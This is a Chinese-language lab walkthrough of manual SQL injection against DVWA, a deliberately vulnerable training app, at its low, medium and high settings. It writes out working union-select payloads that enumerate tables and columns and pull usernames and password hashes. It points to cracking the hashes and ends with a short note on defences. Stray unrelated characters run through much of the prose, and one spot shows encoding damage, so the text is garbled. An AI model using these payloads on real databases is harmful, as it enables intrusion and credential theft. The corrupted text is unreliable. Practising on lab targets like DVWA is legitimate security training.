DVWA--V1.9,SQL注入手動(dòng)測(cè)試

Low SQL Injection

輸入1 or1 = 1脓诡，并沒有值得期待的東西出來(lái)秋秤，看來(lái)數(shù)字型是不可以了屉更，繼續(xù)測(cè)試

加個(gè)引號(hào)輸入1‘之后余指，報(bào)錯(cuò)洋侨，可以看到1’變?yōu)?'1''',說(shuō)明sql語(yǔ)句為select first_name from users from id = '1',此時(shí)因?yàn)槎嗔艘粋€(gè)'而報(bào)錯(cuò)（在sql語(yǔ)句中毡熏，字符串被''所包）坦敌，看來(lái)有戲

查看源碼，痢法，符合我們的猜想：

進(jìn)行注入

輸入：1' or '1' = '1

接下來(lái)就是執(zhí)行SQl語(yǔ)句：

首先查詢有多少列狱窘，這里提供了里兩種方法，(當(dāng)然财搁，這里只是在測(cè)試平臺(tái)上蘸炸，實(shí)際情況中，情況往往要更為復(fù)雜尖奔，可能會(huì)有上百列搭儒，那時(shí)候我們可以利用Python腳本來(lái)幫助我們執(zhí)行這一過(guò)程)

輸入%' or 0 = 0 union select 1,2 #

first name為第一列的值，surname為查詢結(jié)果第二列的值

order by 3

查詢信息的列數(shù)提茁，當(dāng)后邊所跟數(shù)字超過(guò)字段數(shù)時(shí)會(huì)報(bào)錯(cuò)

%' or 0 =0 union select null,version()#

1' and 1=2 union select version(),database() --

利用ersion(),user(),database()函數(shù)來(lái)獲得數(shù)據(jù)庫(kù)信息

%' or '0' = '0' union select null,table_name from information_schema.tables#

1'or1=1 union select null,table_name from information_schema.tables#

information_schema是一個(gè)存儲(chǔ)了其他數(shù)據(jù)庫(kù)列信息的數(shù)據(jù)庫(kù)

有一個(gè)user數(shù)據(jù)庫(kù)

%' or 1 = 0 union select null,concat(table_name,0x0a,column_name) from information_schema.columns where table_name = 'users'#

顯示所有users表中的列淹禾，包括user_id,first_name,last_name,user,password

0x0a是新建一行的ASCII十六進(jìn)制代碼。使用它來(lái)分離用戶名稱和密碼茴扁。更多關(guān)于ASCII表可以查看http://www.bluesock.org/~willg/dev/ascii.html铃岔。

與數(shù)據(jù)庫(kù)中的列信息比較，相同

%' and 1=0 union select null,concat(first_name,' ',last_name,' ',user),password from users#

'union select concat(first_name,' ',last_name,' ',user),password from users#

'union select user,password from users --

%' and 1=0 union select user,password from users#

得到用戶名與密碼

Medium leval:

相比于低級(jí)的DVWA峭火，中級(jí)的在源代碼中多了$id = mysql_real_escape_string($id);

有關(guān)他的用法毁习，可以參考http://php.net/manual/en/function.mysql-real-escape-string.php智嚷，這里不做過(guò)多講解，大概知道他是可以過(guò)濾掉一部分字符纺且，\,'等盏道；

而且增加了一個(gè)select選項(xiàng)，去掉了輸入框

使用另外一種類型的注入方法：數(shù)字型注入

使用firebug直接修改select的值

payload: 1 or 1 = 1 union select user,password from users #

High leval:

查看源代碼隆檀，發(fā)現(xiàn)id是直接取自所輸入的值摇天，沒有做過(guò)多更改

Limit1表示只需要一行數(shù)據(jù)

采用low leval的方法進(jìn)行注入，payload: ' union select user,password from users #

得到的密碼是MD5加密的恐仑，解密的話可以網(wǎng)上找在線解密MD5各種網(wǎng)站泉坐，搜索框輸入CMD5即可：

或者可以使用John the Ripper這款工具來(lái)破解，

后記

在某一版本的DVWA中的高級(jí)SQLI中裳仆，部分源代碼如下

$id = $_GET['id'];

$id = stripslashes($id);

$id = mysql_real_escape_string($id);

if (is_numeric($id)) {

$getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'";

相比于Medium腕让，增加了兩個(gè)函數(shù)，stripslashes($id);刪除了反斜杠歧斟，if (is_numeric($id))檢查了變量是否為數(shù)字纯丸，告訴了我們應(yīng)該如何防止SQL注入，防止SQL注入可以簡(jiǎn)單總結(jié)一下静袖，檢查用戶輸入觉鼻，用戶輸入的應(yīng)該是程序員所希望輸入的，而不是其他的一些字符队橙，同樣也適用于XSS等Web漏洞坠陈。